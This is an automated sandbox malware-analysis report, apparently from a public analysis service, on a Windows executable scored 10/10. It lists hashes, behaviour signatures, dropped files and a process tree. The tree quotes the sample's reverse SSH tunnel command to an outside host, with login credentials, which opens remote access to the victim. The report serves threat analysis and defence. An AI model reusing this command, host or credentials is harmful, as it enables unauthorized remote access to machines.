Overview

overview

10

Static

static

3

ce8b733327...18.exe

windows7-x64

10

ce8b733327...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    140s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06/09/2024, 03:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe

  • Size

    309KB

  • MD5

    ce8b733327c4d5479517c47c9d381f9c

  • SHA1

    37566d7f4f4a04d3fa6b92fdfc239503a5f7b786

  • SHA256

    0d4513334bb732e946a351639befd3e4041a4eece56d7accc480c8c674259bcb

  • SHA512

    f8201f02ad15c3cdee9430c8dcbd450f77c502e0d9126b52d8a094883c840ccd461912f1466d1ddb929a2260e5b03123dac6a2b181a2f51b3b575930eb491673

  • SSDEEP

    6144:2zG8nriOnW/rGgGh4Xw5PfK0OTvQXVU18atNdkfHhylhqHWHMLFqmXPr9:O1DYrr0OcXG8a3uiq2s4c

Score
10/10
discoveryevasionupx

Malware Config

Signatures

  • Modifies firewall policy service 3 TTPs 5 IoCs
    evasion
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\ce8b733327c4d5479517c47c9d381f9c_JaffaCakes118.exe"
    1⤵
    • Modifies firewall policy service
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2860
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Recycle.Msi\alg.vbe"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2828
      • C:\Recycle.Msi\cssrs.exe
        "C:\Recycle.Msi\cssrs.exe" -d -t -l -e0.0.0.0 -i127.0.0.1 -p2103 -a
        3⤵
        • Executes dropped EXE
        PID:2864
      • C:\Recycle.Msi\System.exe
        "C:\Recycle.Msi\System.exe" -ssh -R 19883:127.0.0.1:2103 zatzat.zapto.org -l user4 -pw 2n1612
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:536

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Recycle.Msi\DiskDoctor.lnk
    Filesize

    1KB

    MD5

    8ba9297b06482f998db6660e954a7c94

    SHA1

    31f35021f36e1af026d3d9b316aba9fcbcde3519

    SHA256

    de34aa5389e6c7f4ee8151ed599267ace4e27253522be33ad4e5517135efa001

    SHA512

    32b6ec909155837f25053307ffb0eaef1deec79e58d062cad5702f5dc76c5d006e9c6315a4852b02bc4afafd350cd156f908157e0dcc59145be9e85975ee0512

    Download Submit

  • C:\Recycle.Msi\System.exe
    Filesize

    142KB

    MD5

    0bf7c44a9324cdbef4e4d457540518a0

    SHA1

    946e0143896a52d4508f8fd6967629b0cb3e27ab

    SHA256

    071ae39526ae90c3f4599610013b34a364de20393ab6abe7ac22e2497612b2f9

    SHA512

    72dba39111ed76bbed5730486ece3b43b6176c97d8ff0b2548046d28aca72f74475eefe6351e6810906fbc725b4e7345fa6592137c35f3e7d2de105ef96d6a73

    Download Submit

  • C:\Recycle.Msi\alg.vbe
    Filesize

    1KB

    MD5

    2a29410953014efc8c487f6ac0451e9f

    SHA1

    df44c3fb883fff38bed99948387948e10989d6ca

    SHA256

    9b65777b5e3ad9e407c98d1f9da210a2dedc4ee9d2dc6df0faf29f992f2cd0b2

    SHA512

    b3540e7b49d1a2c1d7b6d72e941d62c72272b31a44d7c7e3db5ba0be4ef480b3493342901a8d2d079070caedfc8d8c79079295a2b9a6b75073708026b3615c03

    Download Submit

  • C:\Recycle.Msi\cssrs.exe
    Filesize

    116KB

    MD5

    263842a10accd37646672eb53bb33790

    SHA1

    95eae922120a3943e5c57a98fe07102758f510a5

    SHA256

    0ffe5e268f520294f2fa45121c023e38737c3b329c5cd34dd28811a4eed67042

    SHA512

    3db4dd3cbda49d9fb52ef36b7ec438c07f34295eb58ddf7af767265ea370454f26ddd4a17dde986601e8636b11506ed5706d40e6ce1754f2bf0490b0b4e6d8e0

    Download Submit

  • memory/536-37-0x0000000000400000-0x000000000045C000-memory.dmp

    Filesize

    368KB

    Download

  • memory/2828-32-0x0000000002860000-0x00000000028BC000-memory.dmp

    Filesize

    368KB

    Download

  • memory/2828-35-0x0000000002860000-0x00000000028BC000-memory.dmp

    Filesize

    368KB

    Download

  • memory/2860-38-0x0000000000400000-0x0000000000422000-memory.dmp

    Filesize

    136KB

    Download